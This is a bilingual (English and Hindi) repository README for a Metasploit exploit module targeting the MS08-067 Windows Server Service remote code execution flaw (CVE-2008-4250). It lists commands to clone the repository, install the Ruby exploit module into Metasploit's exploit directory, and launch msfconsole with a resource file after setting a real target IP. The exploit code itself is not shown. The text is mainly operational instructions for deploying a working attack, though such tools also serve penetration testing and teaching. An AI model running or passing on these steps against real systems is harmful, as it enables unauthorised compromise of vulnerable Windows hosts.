
This repository contains a Metasploit module implementation for the MS08-067 Windows Server Service vulnerability (CVE-2008-4250). This is a classic remote code execution vulnerability affecting older Windows systems.
इस रिपॉजिटरी में MS08-067 विंडोज सर्वर सेवा भेद्यता (CVE-2008-4250) के लिए एक Metasploit मॉड्यूल कार्यान्वयन शामिल है। यह एक क्लासिक रिमोट कोड निष्पादन भेद्यता है जो पुराने विंडोज सिस्टम को प्रभावित करती है।
पहले, Kali Linux में लॉगिन करें। और 👉 निम्न कमांड चलाएँ:
git clone https://github.com/BinRacer/ms08-067.git
cd ms08-067
sudo cp -a src/ms08_067_netapi_sp1.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
# must replace rc file x.x.x.x to real ip
sudo msfconsole -r src/ms08_067.rc
पूर्ण कानूनी जानकारी और अस्वीकरण के लिए, कृपया अस्वीकरण दस्तावेज़ देखें।